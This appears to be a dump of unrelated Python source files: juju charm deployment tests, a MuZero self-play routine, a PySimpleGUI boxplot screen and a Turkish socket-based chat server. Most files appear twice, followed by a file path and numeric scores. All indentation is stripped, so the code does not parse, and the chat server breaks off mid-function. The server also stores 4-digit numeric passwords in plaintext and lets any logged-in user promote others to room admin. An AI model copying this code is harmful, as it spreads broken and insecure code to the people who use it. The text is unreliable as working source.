@pytest.mark.asyncio
async def test_deploy_charmstore_charm(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('cs:ubuntu-0')
await model.block_until(lambda: (len(app.units) > 0 and
app.units[0].machine))
assert app.data['charm-url'] == 'cs:ubuntu-0'
@base.bootstrapped
@pytest.mark.asyncio
async def test_deploy_charmhub_charm(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('ch:hello-juju')
await model.block_until(lambda: (len(app.units) > 0 and
app.units[0].machine))
assert 'hello-juju' in app.data['charm-url']
@base.bootstrapped
@pytest.mark.asyncio
async def test_upgrade_charm(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('cs:ubuntu-0')
await model.block_until(lambda: (len(app.units) > 0 and
app.units[0].machine))
assert app.data['charm-url'] == 'cs:ubuntu-0'
await app.upgrade_charm()
assert app.data['charm-url'].startswith('cs:ubuntu-')
assert app.data['charm-url'] != 'cs:ubuntu-0'
@base.bootstrapped
@pytest.mark.asyncio
async def test_upgrade_charm_channel(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('cs:ubuntu-0')
await model.block_until(lambda: (len(app.units) > 0 and
app.units[0].machine))
assert app.data['charm-url'] == 'cs:ubuntu-0'
await app.upgrade_charm(channel='stable')
assert app.data['charm-url'].startswith('cs:ubuntu-')
assert app.data['charm-url'] != 'cs:ubuntu-0'
@base.bootstrapped
@pytest.mark.asyncio
async def test_upgrade_charm_revision(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('cs:ubuntu-0')
await model.block_until(lambda: (len(app.units) > 0 and
app.units[0].machine))
assert app.data['charm-url'] == 'cs:ubuntu-0'
await app.upgrade_charm(revision=8)
assert app.data['charm-url'] == 'cs:ubuntu-8'
@base.bootstrapped
@pytest.mark.asyncio
async def test_upgrade_charm_switch(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('cs:ubuntu-0')
await model.block_until(lambda: (len(app.units) > 0 and
app.units[0].machine))
assert app.data['charm-url'] == 'cs:ubuntu-0'
await app.upgrade_charm(switch='ubuntu-8')
assert app.data['charm-url'] == 'cs:ubuntu-8'
@base.bootstrapped
@pytest.mark.asyncio
async def test_upgrade_local_charm(event_loop):
async with base.CleanModel() as model:
tests_dir = Path(__file__).absolute().parent
charm_path = tests_dir / 'upgrade-charm'
app = await model.deploy('cs:ubuntu', series='focal')
await model.wait_for_idle(status="active")
assert app.data['charm-url'].startswith('cs:ubuntu')
await app.upgrade_charm(path=charm_path)
await model.wait_for_idle(status="waiting")
assert app.data['charm-url'] == 'local:focal/ubuntu-0'
@base.bootstrapped
@pytest.mark.asyncio
async def test_upgrade_charm_resource(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('cs:~juju-qa/bionic/upgrade-charm-resource-test-0')
await model.wait_for_idle(wait_for_units=1)
unit = app.units[0]
expected_message = 'I have no resource.'
assert unit.workload_status_message == expected_message
await app.upgrade_charm(revision=1)
await model.block_until(
lambda: unit.workload_status_message != 'I have no resource.',
timeout=60,
)
expected_message = 'My resource: I am the resource.'
assert app.units[0].workload_status_message == expected_message
@base.bootstrapped
@pytest.mark.asyncio
async def test_trusted(event_loop):
async with base.CleanModel() as model:
await model.deploy('cs:~juju-qa/bundle/basic-trusted-1', trust=True)
ubuntu_app = model.applications['ubuntu']
trusted = await ubuntu_app.get_trusted()
assert trusted is True
await ubuntu_app.set_trusted(False)
trusted = await ubuntu_app.get_trusted()
assert trusted is False
|
tests/integration/test_application.py
|
from pathlib import Path
import pytest
from .. import base
MB = 1
@base.bootstrapped
@pytest.mark.asyncio
async def test_action(event_loop):
async with base.CleanModel() as model:
ubuntu_app = await model.deploy(
'percona-cluster',
application_name='mysql',
series='xenial',
channel='stable',
config={
'tuning-level': 'safest',
},
constraints={
'arch': 'amd64',
'mem': 256 * MB,
},
)
# update and check app config
await ubuntu_app.set_config({'tuning-level': 'fast'})
config = await ubuntu_app.get_config()
assert config['tuning-level']['value'] == 'fast'
# Restore config back to default
await ubuntu_app.reset_config(['tuning-level'])
config = await ubuntu_app.get_config()
assert config['tuning-level']['value'] == 'safest'
# update and check app constraints
await ubuntu_app.set_constraints({'mem': 512 * MB})
constraints = await ubuntu_app.get_constraints()
assert constraints['mem'] == 512 * MB
# check action definitions
actions = await ubuntu_app.get_actions()
assert 'backup' in actions.keys()
@base.bootstrapped
@pytest.mark.asyncio
async def test_get_set_config(event_loop):
async with base.CleanModel() as model:
ubuntu_app = await model.deploy(
'percona-cluster',
application_name='mysql',
series='xenial',
channel='stable',
config={
'tuning-level': 'safest',
},
constraints={
'arch': 'amd64',
'mem': 256 * MB,
},
)
config = await ubuntu_app.get_config()
await ubuntu_app.set_config(config)
config2 = await ubuntu_app.get_config()
assert config == config2
@base.bootstrapped
@pytest.mark.asyncio
async def test_status_is_not_unset(event_loop):
async with base.CleanModel() as model:
app = await model.deploy(
'cs:ubuntu-0',
application_name='ubuntu',
series='trusty',
channel='stable',
)
assert app.status != 'unset'
@base.bootstrapped
@pytest.mark.asyncio
async def test_status(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('cs:~juju-qa/blocked-0')
def app_ready():
if not app.units:
return False
return app.status == 'blocked'
await model.block_until(app_ready, timeout=480)
assert app.status == 'blocked'
@base.bootstrapped
@pytest.mark.asyncio
async def test_add_units(event_loop):
from juju.unit import Unit
async with base.CleanModel() as model:
app = await model.deploy(
'cs:ubuntu-0',
application_name='ubuntu',
series='trusty',
channel='stable',
)
units = await app.add_units(count=2)
assert len(units) == 2
for unit in units:
assert isinstance(unit, Unit)
@base.bootstrapped
@pytest.mark.asyncio
async def test_deploy_charmstore_charm(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('cs:ubuntu-0')
await model.block_until(lambda: (len(app.units) > 0 and
app.units[0].machine))
assert app.data['charm-url'] == 'cs:ubuntu-0'
@base.bootstrapped
@pytest.mark.asyncio
async def test_deploy_charmhub_charm(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('ch:hello-juju')
await model.block_until(lambda: (len(app.units) > 0 and
app.units[0].machine))
assert 'hello-juju' in app.data['charm-url']
@base.bootstrapped
@pytest.mark.asyncio
async def test_upgrade_charm(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('cs:ubuntu-0')
await model.block_until(lambda: (len(app.units) > 0 and
app.units[0].machine))
assert app.data['charm-url'] == 'cs:ubuntu-0'
await app.upgrade_charm()
assert app.data['charm-url'].startswith('cs:ubuntu-')
assert app.data['charm-url'] != 'cs:ubuntu-0'
@base.bootstrapped
@pytest.mark.asyncio
async def test_upgrade_charm_channel(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('cs:ubuntu-0')
await model.block_until(lambda: (len(app.units) > 0 and
app.units[0].machine))
assert app.data['charm-url'] == 'cs:ubuntu-0'
await app.upgrade_charm(channel='stable')
assert app.data['charm-url'].startswith('cs:ubuntu-')
assert app.data['charm-url'] != 'cs:ubuntu-0'
@base.bootstrapped
@pytest.mark.asyncio
async def test_upgrade_charm_revision(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('cs:ubuntu-0')
await model.block_until(lambda: (len(app.units) > 0 and
app.units[0].machine))
assert app.data['charm-url'] == 'cs:ubuntu-0'
await app.upgrade_charm(revision=8)
assert app.data['charm-url'] == 'cs:ubuntu-8'
@base.bootstrapped
@pytest.mark.asyncio
async def test_upgrade_charm_switch(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('cs:ubuntu-0')
await model.block_until(lambda: (len(app.units) > 0 and
app.units[0].machine))
assert app.data['charm-url'] == 'cs:ubuntu-0'
await app.upgrade_charm(switch='ubuntu-8')
assert app.data['charm-url'] == 'cs:ubuntu-8'
@base.bootstrapped
@pytest.mark.asyncio
async def test_upgrade_local_charm(event_loop):
async with base.CleanModel() as model:
tests_dir = Path(__file__).absolute().parent
charm_path = tests_dir / 'upgrade-charm'
app = await model.deploy('cs:ubuntu', series='focal')
await model.wait_for_idle(status="active")
assert app.data['charm-url'].startswith('cs:ubuntu')
await app.upgrade_charm(path=charm_path)
await model.wait_for_idle(status="waiting")
assert app.data['charm-url'] == 'local:focal/ubuntu-0'
@base.bootstrapped
@pytest.mark.asyncio
async def test_upgrade_charm_resource(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('cs:~juju-qa/bionic/upgrade-charm-resource-test-0')
await model.wait_for_idle(wait_for_units=1)
unit = app.units[0]
expected_message = 'I have no resource.'
assert unit.workload_status_message == expected_message
await app.upgrade_charm(revision=1)
await model.block_until(
lambda: unit.workload_status_message != 'I have no resource.',
timeout=60,
)
expected_message = 'My resource: I am the resource.'
assert app.units[0].workload_status_message == expected_message
@base.bootstrapped
@pytest.mark.asyncio
async def test_trusted(event_loop):
async with base.CleanModel() as model:
await model.deploy('cs:~juju-qa/bundle/basic-trusted-1', trust=True)
ubuntu_app = model.applications['ubuntu']
trusted = await ubuntu_app.get_trusted()
assert trusted is True
await ubuntu_app.set_trusted(False)
trusted = await ubuntu_app.get_trusted()
assert trusted is False
| 0.406862 | 0.264216 |
from ..utils.game_history import game_event_history
import torch
import numpy as np
from ..model.components import transform_input
from ..tree.temperture import *
def play_game(model, env, self_play=False, custom_end_function=None, custom_reward_function=None, custom_state_function=None, extra_loss_tracker=None, timeout_steps=100):
"""
PLays a game with a given model
Parameters
----------
model : Muzero
the muzero model
env : gym.env
the environment
self_play : bool, optional
should self_play be used (not fully implemented), by default False
custom_end_function : callable, optional
should a custom function be used for determing if a game is done, by default None
custom_reward_function : callable, optional
should a custom function be used for the reward function, by default None
custom_state_function : callable, optional
should a custom function be used to get the observation of the enviorment, by default None
extra_loss_tracker : callable, optional
should a function calculate a extra loss, by default None
timeout_steps : int, optional
max steps to take in a environment, by default 100
Returns
-------
game_event_history
the events taken place in the game
"""
model.reset()
observation = env.reset()
game_history = game_event_history()
done = False
step = 0
temperature = 1
while not done and step < timeout_steps:
if self_play:
action, policy = model.think(observation)
best_action = action.item()
observation, reward, done = env.step(best_action)[:3]
game_history.add(
action=policy,
reward=None,
value=None,
state=None
)
else:
observation = custom_state_function(env) if custom_state_function is not None else observation
state = transform_input(observation)
info = extra_loss_tracker(env) if extra_loss_tracker else None
if model.use_naive_search:
best_action = model.plan_action_naive(state)
else:
legal_actions = getattr(env, "legal_actions", None)
legal_actions = legal_actions() if legal_actions is not None else None
if legal_actions is not None and len(legal_actions) == 0:
break
best_action = temperature_softmax(model.plan_action(state, legal_actions), T=(temperature), size=model.action_size)
temperature *= 0.9
observation, reward, done = env.step(best_action)[:3]
if custom_end_function is not None:
done = custom_end_function(env)
if custom_reward_function is not None:
reward = custom_reward_function(env, done)
game_history.add(
reward=torch.tensor([reward]).reshape((1, -1)),
action=best_action,
policy=None if model.use_naive_search else model.tree.get_policy(),
value=torch.tensor([1]).reshape((1, -1)) if not done else torch.tensor([0]).reshape((1, -1)),
state=state,
info=info
)
model.reset()
step += 1
return game_history
def selfplay_single_player(model, env, games=10):
"""
Since the model will is playing a single player game
the self play algorithm needs to be adjusted to account for this
Parameters
----------
model : muzero
muzero - since we are working with only one model (since it's single player) no need for model storage
env : gym.Env
the environment where the model will be playing
"""
history = []
for _ in range(games):
history.append(play_game(model, env, self_play=True))
sorted_history = sorted(history, key=lambda x: x.historic_reward)
middle = len(sorted_history) // 2
bad_plays = sorted_history[:middle]
win_plays = sorted_history[middle:]
loss = 0
for player, sign in zip([bad_plays, win_plays], [-1, 1]):
for game in player:
for event in game.history:
loss += (sign * event.action).sum()
return loss
|
musweeper/musweeper/muzero/model/selfplay.py
|
from ..utils.game_history import game_event_history
import torch
import numpy as np
from ..model.components import transform_input
from ..tree.temperture import *
def play_game(model, env, self_play=False, custom_end_function=None, custom_reward_function=None, custom_state_function=None, extra_loss_tracker=None, timeout_steps=100):
"""
PLays a game with a given model
Parameters
----------
model : Muzero
the muzero model
env : gym.env
the environment
self_play : bool, optional
should self_play be used (not fully implemented), by default False
custom_end_function : callable, optional
should a custom function be used for determing if a game is done, by default None
custom_reward_function : callable, optional
should a custom function be used for the reward function, by default None
custom_state_function : callable, optional
should a custom function be used to get the observation of the enviorment, by default None
extra_loss_tracker : callable, optional
should a function calculate a extra loss, by default None
timeout_steps : int, optional
max steps to take in a environment, by default 100
Returns
-------
game_event_history
the events taken place in the game
"""
model.reset()
observation = env.reset()
game_history = game_event_history()
done = False
step = 0
temperature = 1
while not done and step < timeout_steps:
if self_play:
action, policy = model.think(observation)
best_action = action.item()
observation, reward, done = env.step(best_action)[:3]
game_history.add(
action=policy,
reward=None,
value=None,
state=None
)
else:
observation = custom_state_function(env) if custom_state_function is not None else observation
state = transform_input(observation)
info = extra_loss_tracker(env) if extra_loss_tracker else None
if model.use_naive_search:
best_action = model.plan_action_naive(state)
else:
legal_actions = getattr(env, "legal_actions", None)
legal_actions = legal_actions() if legal_actions is not None else None
if legal_actions is not None and len(legal_actions) == 0:
break
best_action = temperature_softmax(model.plan_action(state, legal_actions), T=(temperature), size=model.action_size)
temperature *= 0.9
observation, reward, done = env.step(best_action)[:3]
if custom_end_function is not None:
done = custom_end_function(env)
if custom_reward_function is not None:
reward = custom_reward_function(env, done)
game_history.add(
reward=torch.tensor([reward]).reshape((1, -1)),
action=best_action,
policy=None if model.use_naive_search else model.tree.get_policy(),
value=torch.tensor([1]).reshape((1, -1)) if not done else torch.tensor([0]).reshape((1, -1)),
state=state,
info=info
)
model.reset()
step += 1
return game_history
def selfplay_single_player(model, env, games=10):
"""
Since the model will is playing a single player game
the self play algorithm needs to be adjusted to account for this
Parameters
----------
model : muzero
muzero - since we are working with only one model (since it's single player) no need for model storage
env : gym.Env
the environment where the model will be playing
"""
history = []
for _ in range(games):
history.append(play_game(model, env, self_play=True))
sorted_history = sorted(history, key=lambda x: x.historic_reward)
middle = len(sorted_history) // 2
bad_plays = sorted_history[:middle]
win_plays = sorted_history[middle:]
loss = 0
for player, sign in zip([bad_plays, win_plays], [-1, 1]):
for game in player:
for event in game.history:
loss += (sign * event.action).sum()
return loss
| 0.794943 | 0.353484 |
import PySimpleGUI as sg
import plotly.graph_objects as go
from NetLogoDOE.src.gui.custom_components import title, question_mark_button, explanation
from NetLogoDOE.src.gui.custom_windows import show_help_window
from NetLogoDOE.src.gui.help_dictionary import help_text
from NetLogoDOE.src.util.data_processing.merge_standard_data import merge_data
class BoxplotScreen:
def __init__(self):
self.layout = [[title('Boxplot')],
[sg.Text('Graph Title: '), sg.Input(key='boxplot_title_input')],
[question_mark_button('boxplot_reporter_help_button'), sg.Text('Reporters to plot:')],
[sg.Multiline('', key='boxplot_reporter_input')],
[explanation('If this field is left empty, all reporters will be plotted.')],
[sg.Button('Generate', key='boxplot_generate_button')],
[sg.Button('Back', key='boxplot_back_button')]]
self.results = None
def check_events(self, event, values, window):
if event == 'standard_write_results_event':
self.results = values['standard_write_results_event']
if event == 'boxplot_generate_button':
self.generate_boxplot(values, window)
if event == 'boxplot_back_button':
window['boxplot_panel'].update(visible=False)
window['standard_result_panel'].update(visible=True)
# Help events
if event == 'boxplot_reporter_help_button':
show_help_window(help_text['standard_plot_reporters'],
location=(window.CurrentLocation()[0] - ((434 - window.size[0]) / 2),
window.CurrentLocation()[1] + 100))
def generate_boxplot(self, values, window):
reporters = self.format_reporters(values)
merged_data = merge_data(self.results[1], 1)
try:
[merged_data[reporter] for reporter in reporters]
except KeyError:
window.write_event_value('show_error_window', 'Error in input: Invalid reporter name.\nPlease make '
'sure all reporters are valid with the current run '
'configuration.')
return
fig = go.Figure()
for key in reporters:
fig.add_trace(go.Box(y=merged_data[key], name=key))
fig.update_layout(title_text=values['boxplot_title_input'],
yaxis_title_text='Value')
fig.show()
def format_reporters(self, values):
if values['boxplot_reporter_input'] == '\n':
return list(self.results[1].keys())
reporters = list(filter(('').__ne__, values['boxplot_reporter_input'].split('\n')))
reporters = list(map(lambda x: x.strip(), reporters))
return reporters
|
NetLogoDOE/src/gui/plots/standard/BoxplotScreen.py
|
import PySimpleGUI as sg
import plotly.graph_objects as go
from NetLogoDOE.src.gui.custom_components import title, question_mark_button, explanation
from NetLogoDOE.src.gui.custom_windows import show_help_window
from NetLogoDOE.src.gui.help_dictionary import help_text
from NetLogoDOE.src.util.data_processing.merge_standard_data import merge_data
class BoxplotScreen:
def __init__(self):
self.layout = [[title('Boxplot')],
[sg.Text('Graph Title: '), sg.Input(key='boxplot_title_input')],
[question_mark_button('boxplot_reporter_help_button'), sg.Text('Reporters to plot:')],
[sg.Multiline('', key='boxplot_reporter_input')],
[explanation('If this field is left empty, all reporters will be plotted.')],
[sg.Button('Generate', key='boxplot_generate_button')],
[sg.Button('Back', key='boxplot_back_button')]]
self.results = None
def check_events(self, event, values, window):
if event == 'standard_write_results_event':
self.results = values['standard_write_results_event']
if event == 'boxplot_generate_button':
self.generate_boxplot(values, window)
if event == 'boxplot_back_button':
window['boxplot_panel'].update(visible=False)
window['standard_result_panel'].update(visible=True)
# Help events
if event == 'boxplot_reporter_help_button':
show_help_window(help_text['standard_plot_reporters'],
location=(window.CurrentLocation()[0] - ((434 - window.size[0]) / 2),
window.CurrentLocation()[1] + 100))
def generate_boxplot(self, values, window):
reporters = self.format_reporters(values)
merged_data = merge_data(self.results[1], 1)
try:
[merged_data[reporter] for reporter in reporters]
except KeyError:
window.write_event_value('show_error_window', 'Error in input: Invalid reporter name.\nPlease make '
'sure all reporters are valid with the current run '
'configuration.')
return
fig = go.Figure()
for key in reporters:
fig.add_trace(go.Box(y=merged_data[key], name=key))
fig.update_layout(title_text=values['boxplot_title_input'],
yaxis_title_text='Value')
fig.show()
def format_reporters(self, values):
if values['boxplot_reporter_input'] == '\n':
return list(self.results[1].keys())
reporters = list(filter(('').__ne__, values['boxplot_reporter_input'].split('\n')))
reporters = list(map(lambda x: x.strip(), reporters))
return reporters
| 0.508544 | 0.181771 |
import socket
import threading
import queue
import time
class loggerThread(threading.Thread):
def __init__(self,loggerQueue,conn,addr):
threading.Thread.__init__(self)
self.loggerQueue = loggerQueue
self.conn = conn
self.addr = addr
def run(self):
logger(self.loggerQueue)
def logger(loggerQueue):
info = loggerQueue.get()
print(info.encode())
class writeThread(threading.Thread):
def __init__(self,threadID,conn,addr,workQueue):
threading.Thread.__init__(self)
self.threadID = threadID
self.conn = conn
self.addr = addr
self.workQueue = workQueue
def run(self):
while True:
request = self.workQueue.get()
self.conn.send(request.encode())
self.conn.close()
class readThread(threading.Thread):
def __init__(self,threadID,conn,addr,clientDict,pidDict,workQueue,roomDict):
threading.Thread.__init__(self)
self.threadID = threadID
self.conn = conn
self.addr = addr
self.clientDict = clientDict
self.pidDict = pidDict
self.workQueue = workQueue
self.roomDict= roomDict
def run(self):
parser(self.threadID,self.clientDict,self.pidDict,self.workQueue,self.conn,self.roomDict)
def parser(threadID,clientDict,pidDict,workQueue,conn,roomDict):
while True:
data = conn.recv(1024)
dataStr = data.decode().strip().split(":")
message = dataStr[0].split(" ")
if message[0] == "REG":
if len(message) == 3:
req = ""
number =len(clientDict)
if number > 0:
if message[1] in clientDict:
if threadID in pidDict and pidDict[threadID] == message[1]:
if clientDict[message[1]][3] == True:
if len(message[2]) == 4:
try:
sifre = int(message[2])
req += "OKS (sifre guncellendi)\n"
clientDict[message[1]][0] = message[2]
#print(clientDict)
queueLock.acquire()
workQueue.put(req)
queueLock.release()
except:
req += "REJN(sifre sadece sayilardan olusmalidir)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
req += "REJN (sifre 4 rakamdan olusmalidir)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
req += "REJN (baska isim kullan)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
req += "REJN (baska isim kullan)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
#---------------------------------------
else:
if len(message[2]) == 4:
try:
sifre = int(message[2])
req += "WELN (kayıt olundu)"+message[1] + "\n"
clientDict[message[1]] = [1,2,[],False]
clientDict[message[1]][0] = message[2]
clientDict[message[1]][1] = workQueue
pidDict[threadID] = message[1]
#print(clientDict)
queueLock.acquire()
workQueue.put(req)
queueLock.release()
except:
req += "REJN(sifre sadece sayilardan olusmalidir)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
req += "REJN (sifre 4 rakamdan olusmalidir)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
#-----------------------------------------------------------------
else:
if len(message[2]) == 4:
try:
sifre = int(message[2])
req += "WELN (kayıt olundu) "+message[1] + "\n"
clientDict[message[1]] = [1,2,[],False]
clientDict[message[1]][0] = message[2]
clientDict[message[1]][1] = workQueue
pidDict[threadID] = message[1]
#print(clientDict)
queueLock.acquire()
workQueue.put(req)
queueLock.release()
except:
req += "REJN(sifre sadece sayilardan olusmalidir)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
req += "REJN (sifre 4 rakamdan olusmalidir)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
queueLock.acquire()
workQueue.put("Arguman eksik ya da fazla\n")
queueLock.release()
elif message[0] == "NIC":
if len(message) == 3:
req = ""
if message[1] in clientDict:
if message[2] == clientDict[message[1]][0]:
req += "WEL (giris yapildi)" + message[1] + "\n"
clientDict[message[1]][3] = True
else:
req += "REJ (sifre hatasi) "+ message[1] + "\n"
else:
req += "REJ (kullanici yok) " +message[1] + "\n"
#print(clientDict)
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
queueLock.acquire()
workQueue.put("Arguman eksik ya da fazla\n")
queueLock.release()
elif message[0] == "OAC":
if len(message) == 2:
req = ""
name = pidDict[threadID]
if message[1] in roomDict:
req += "REJC " + message[1] + "\n"
else:
req += "OKC " + message[1] +"\n"
roomDict[message[1]] = [[],[],[]]
roomDict[message[1]][0].append(pidDict[threadID])
clientDict[name][2].append(message[1])
print(roomDict)
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
queueLock.acquire()
workQueue.put("Arguman eksik ya da fazla\n")
queueLock.release()
elif message[0] == "GIR":
if len(message) == 2:
req = ""
name = pidDict[threadID]
if message[1] in roomDict:
if clientDict[name][3] == True:
if name in roomDict[message[1]][2]:
req += "YSK (Engellenmisin)\n"
else:
req += "OKO (odaya giris yapildi)\n"
bildirim = name +" "+ message[1] + " odasina giris yapti\n"
clientDict[name][2].append(message[1])
roomDict[message[1]][1].append(name)
for i in roomDict[message[1]][1]:
queueLock.acquire()
clientDict[i][1].put(bildirim)
queueLock.release()
for j in roomDict[message[1]][0]:
queueLock.acquire()
clientDict[j][1].put(bildirim)
queueLock.release()
else:
req += "YSK" + "giris yapilmamis\n"
else:
req += "YSK (oda yok)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
queueLock.acquire()
workQueue.put("Arguman eksik ya da fazla\n")
queueLock.release()
elif message[0] == "QUI":
name = pidDict[threadID]
clientDict[name][3] = False
queueLock.acquire()
queueList[threadID].put("BYE\n")
queueLock.release()
elif message[0] == "PIN":
queueLock.acquire()
queueList[threadID].put("PON\n")
queueLock.release()
elif message[0] == "PRV":
if len(message) == 2:
name = pidDict[threadID]
if name in clientDict:
if clientDict[name][3] == True:
if message[1] in clientDict:
if clientDict[message[1]][3] == True:
if len(dataStr) == 2:
req =pidDict[threadID] + "->" + dataStr[1] + "\n"
adres = message[1]
queueLock.acquire()
clientDict[adres][1].put(req)
workQueue.put("OKP\n")
queueLock.release()
else:
req = "NOP (mesaj birakmadiniz)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
queueLock.acquire()
workQueue.put("NOP (kullanici online degil)\n")
queueLock.release()
else :
req = "NOP " + message[1] + "\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
req = "NOP (giris yap) \n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
req = "LRR \n"
queueLock.acquire()
queueList[threadID].put(req)
queueLock.release()
else:
queueLock.acquire()
workQueue.put("Arguman eksik ya da fazla\n")
queueLock.release()
elif message[0] == "GNL":
if len(message) == 2:
name = pidDict[threadID]
if clientDict[name][3] == True:
if message[1] in roomDict:
if name in roomDict[message[1]][1] or name in roomDict[message[1]][0] :
if len(dataStr) == 2:
queueLock.acquire()
workQueue.put("OKG\n")
queueLock.release()
for i in roomDict[message[1]][1]:
req = name + "->" + dataStr[1] + "\n"
queueLock.acquire()
clientDict[i][1].put(req)
queueLock.release()
for j in roomDict[message[1]][0]:
req = name + "->" + dataStr[1] + "\n"
queueLock.acquire()
clientDict[j][1].put(req)
queueLock.release()
else:
queueLock.acquire()
workQueue.put("NOG (mesaj birakmadiniz)\n")
queueLock.release()
else:
queueLock.acquire()
workQueue.put("NOG(grupta degilsin)\n")
queueLock.release()
else:
queueLock.acquire()
workQueue.put("NOG(oyle oda yok)\n")
queueLock.release()
#-----------------------
else:
queueLock.acquire()
workQueue.put("NOG(giris yapilmamis)\n")
queueLock.release()
else:
queueLock.acquire()
workQueue.put("Arguman eksik ya da fazla\n")
queueLock.release()
elif message[0] == "GOL":
req = ""
name = pidDict[threadID]
if len(clientDict[name][2]) > 0:
for i in clientDict[name][2]:
req += i + ":"
else:
req += "NOK(girilen oda yok)"
req += "\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
elif message[0] == "CIK":
if len(message) == 2:
req = ""
name = pidDict[threadID]
if message[1] in roomDict:
if name in roomDict[message[1]][1]:
req += "OKK " + message[1] + "\n"
bildirim = name+" "+message[1] +" "+"odasindan cikis yapti\n"
roomDict[message[1]][1].remove(name)
clientDict[name][2].remove(message[1])
for i in roomDict[message[1]][1]:
queueLock.acquire()
clientDict[i][1].put(bildirim)
queueLock.release()
for j in roomDict[message[1]][0]:
queueLock.acquire()
clientDict[j][1].put(bildirim)
queueLock.release()
elif name in roomDict[message[1]][0]:
req += "OKK " + message[1] + "\n"
bildirim = name+" "+message[1] +" "+"odasindan cikis yapti\n"
roomDict[message[1]][0].remove(name)
clientDict[name][2].remove(message[1])
for i in roomDict[message[1]][1]:
queueLock.acquire()
clientDict[i][1].put(bildirim)
queueLock.release()
for j in roomDict[message[1]][0]:
queueLock.acquire()
clientDict[j][1].put(bildirim)
queueLock.release()
else:
req += "NOK (odada degilsin) \n"
else:
req += "NOK (oda yok) \n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
queueLock.acquire()
workQueue.put("Arguman eksik ya da fazla\n")
queueLock.release()
elif message[0] == "OLS":
req = "OLST "
name = pidDict[threadID]
if clientDict[name][3] == True:
for i in roomDict:
req += i + ":"
req += "\n"
else:
req += "NOLS Giris yapin"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
elif message[0] == "ENG":
if len(message) == 3:
req = ""
name = pidDict[threadID]
if clientDict[name][3] == True:
if message[1] in roomDict:
if name in roomDict[message[1]][0]:
req += "OKE\n"
bildirim= message[1] + " odasından engellendiniz.\n"
roomDict[message[1]][2].append(message[2])
queueLock.acquire()
clientDict[message[2]][1].put(bildirim)
queueLock.release()
else:
req += "NOE(engel icin yonetici olmak lazim)\n"
else:
req += "NOE(boyle oda yok)\n"
else:
req += "NOE(giris yap)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
queueLock.acquire()
workQueue.put("Arguman eksik ya da fazla\n")
queueLock.release()
elif message[0] == "OKL":
if len(message) == 2:
req = ""
name = pidDict[threadID]
if clientDict[name][3] == True:
if message[1] in roomDict:
if message[1] in clientDict[name][2]:
for i in roomDict[message[1]][1]:
req += i + ": normal\n"
for j in roomDict[message[1]][0]:
req += j + ": yonetici\n"
else:
req += "NOL(odada yoksun)\n"
else:
req += "NOL(oyle oda yok)\n"
else:
req += "NOL(giris yap) \n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
queueLock.acquire()
workQueue.put("Arguman eksik ya da fazla\n")
queueLock.release()
elif message[0] == "KAT":
if len(message) == 3:
req = ""
name = pidDict[threadID]
if clientDict[name][3] == True:
if message[1] in roomDict:
if message[2] in roomDict[message[1]][1]:
if name in roomDict[message[1]][0]:
req += "OKT\n"
mesaj = message[1] + " odasindan atildiniz\n"
roomDict[message[1]][1].remove(message[2])
roomDict[message[1]][2].append(message[2])
clientDict[message[2]][2].remove(message[1])
queueLock.acquire()
clientDict[message[2]][1].put(mesaj)
queueLock.release()
else:
req += "REJT(engel icin yonetici olmak lazim)\n"
else:
req += "REJT(Odada boyle biri yok)\n"
else:
req += "REJT(boyle oda yok)\n"
else:
req += "REJT(giris yap)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
queueLock.acquire()
workQueue.put("Arguman eksik ya da fazla\n")
queueLock.release()
elif message[0] == "SIL":
if len(message)==2:
req = ""
name = pidDict[threadID]
if clientDict[name][3] == True:
if message[1] in roomDict:
if name in roomDict[message[1]][0]:
req += "OKS\n"
bildirim = message[1] + " odasi silindi.\n"
for i in roomDict[message[1]][0]:
clientDict[i][2].remove(message[1])
queueLock.acquire()
clientDict[i][1].put(bildirim)
queueLock.release()
for j in roomDict[message[1]][1]:
clientDict[j][2].remove(message[1])
queueLock.acquire()
clientDict[j][1].put(bildirim)
queueLock.release()
del roomDict[message[1]]
else:
req += "OSS(yonetici olman lazim)\n"
else:
req += "OSS(boyle oda yok)\n"
else:
req += "OSS(giris yap)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
queueLock.acquire()
workQueue.put("Arguman eksik ya da fazla\n")
queueLock.release()
elif message[0] == "YON":
if len(message) == 3:
req = ""
name = pidDict[threadID]
if clientDict[name][3] == True:
if message[1] in roomDict:
if message[2] in roomDict[message[1]][1]:
roomDict[message[1]][1].remove(message[2])
roomDict[message[1]][0].append(message[2])
req += "OKY "+ message[2] +" yonetici yapildi.\n"
bildirim = message[1]+ " odasina yonetici yapildiniz\n"
queueLock.acquire()
clientDict[message[2]][1].put(bildirim)
queueLock.release()
else:
